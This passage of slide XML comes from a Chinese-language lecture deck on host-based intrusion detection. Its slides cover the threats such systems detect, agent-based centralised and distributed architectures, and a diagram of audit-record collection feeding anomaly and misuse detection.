            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">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7477" name="AutoShape 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0DD9699-68AB-406E-990E-3A9E9DDB2851}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1358" y="2885"/>
              <a:ext cx="3205" cy="305"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147478" name="Line 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E15F417-6AF1-467C-8986-0F1C7DC9D9E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2407" y="2580"/>
              <a:ext cx="1" cy="305"/>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7479" name="Line 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770AC877-5383-448F-8F6F-C6130CC2A9AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4157" y="2580"/>
              <a:ext cx="1" cy="305"/>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a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147480" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{292A4331-CFD7-426C-A6F6-EFD96F50A497}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2757" y="2046"/>
              <a:ext cx="1335" cy="2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1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>审计记录</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>协议数据等</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147481" name="Rectangle 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C8B428-D59A-4B83-97B0-8DB4FA671EC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4332" y="2046"/>
              <a:ext cx="623" cy="22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1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>系统操作</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147482" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7722302-4B7A-4ADB-BF99-20BB6328640A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1920" y="3408"/>
              <a:ext cx="1760" cy="2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800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>简单的入侵检测示意图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23D6384-E960-4241-B7BE-8C8CFC0947AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于主机的入侵检测系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148483" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DD4EBB-85FB-4175-A736-DE6DCDB7920F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>系统分析主机产生的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>应用程序及操作系统的事件日志、程序行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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D9B80D26-A9B8-4AE7-8492-A7FF9C576F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于主机的检测威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149507" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B70D24E0-0730-44E1-AF35-2BFA08DF31F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2286000"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>特权滥用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>关键数据的访问及修改</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>安全配置的变化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>程序行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1D2FCD95-C4F0-47C3-BDAE-860335BC3075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="8153400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于主机的入侵检测系统结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150531" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{109E21EF-737B-488C-AE92-87F9B26DB676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>基于主机的入侵检测系统通常是基于代理的，代理是运行在目标系统上的可执行程序，与中央控制计算机通信</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>集中式：原始数据在分析之前要先发送到中央位置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>分布式：原始数据在目标系统上实时分析，只有告警命令被发送给控制台</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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D9220C9D-81A9-4FF0-90C7-194D9C241BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7924800" cy="5638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51555" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54D1D363-AF8D-4ED4-BD82-42584D53E292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="914400"/>
            <a:ext cx="6248400" cy="5410200"/>
            <a:chOff x="1800" y="2376"/>
            <a:chExt cx="7380" cy="8268"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151556" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DA75BCE-13E1-4678-9198-F7C03D9ABABF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="2376"/>
              <a:ext cx="1620"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目标系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151557" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8090645F-23E3-41F3-ADAA-679A5259D3E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2700" y="3468"/>
              <a:ext cx="2520"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审计记录收集方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151558" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A638320-FDB7-4BA2-8F6B-8FFD02F1D259}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2880" y="4560"/>
              <a:ext cx="2160"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审计记录预处理</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151559" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7CDE41-32BF-49E3-AEDA-F849A9D42E07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1800" y="6120"/>
              <a:ext cx="1620"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异常检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151560" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D971EB88-FEEE-4495-B481-9A4836E4738A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4860" y="6120"/>
              <a:ext cx="1620"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误用检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151561" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1B3C0C-7162-468F-9507-ABFEB0CEA213}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2880" y="7524"/>
              <a:ext cx="2520" cy="468"/>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安全管理员接口</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151562" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8394480E-8747-4972-86B4-3D966B9BC7FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6660" y="7368"/>
              <a:ext cx="2520" cy="780"/>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审计记录数据</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>归档</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>查询</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151563" name="AutoShape 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDFDE81-FCCE-4265-958D-126C826E18AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6840" y="8772"/>
              <a:ext cx="2160" cy="780"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>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审计记录数据库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151564" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28675ED7-2A58-4378-B674-46361FB2B117}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3960" y="2844"/>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65" name="Line 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BA01D08-D2E6-42E8-89FD-F1BE688FFD94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3960" y="3936"/>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66" name="Line 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F5BF7BD-BF4B-46FC-A76A-C1603207B0B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2520" y="5496"/>
              <a:ext cx="3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7" name="Line 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE0D581D-1476-4B2B-9055-68138DC63F55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3960" y="502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68" name="Line 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72B0C016-2CCB-4363-818E-700086BC9C06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2520" y="5496"/>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69" name="Line 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F840263C-736A-4A68-B62A-E9B5F6A8A1B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5760" y="5496"/>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70" name="Line 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1500B47-810C-4CD0-B027-7EBF0EFAF93D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2520" y="7056"/>
              <a:ext cx="3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71" name="Line 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A557AF-710C-44C1-B728-0C1F0C74E831}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2520" y="658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72" name="Line 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C03FDEAA-B06D-4C11-A169-8DFF5F093578}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5760" y="6588"/>
              <a:ext cx="0" cy="46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73" name="Line 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D82EA5D-A128-456D-98DD-157F63077908}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3960" y="7056"/>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74" name="Line 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{096A5BB3-D482-4EA3-8486-DBABEE19BE54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5400" y="7680"/>
              <a:ext cx="126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75" name="Line 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C1776D5-91A1-4E73-AB6A-0B7773C680A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
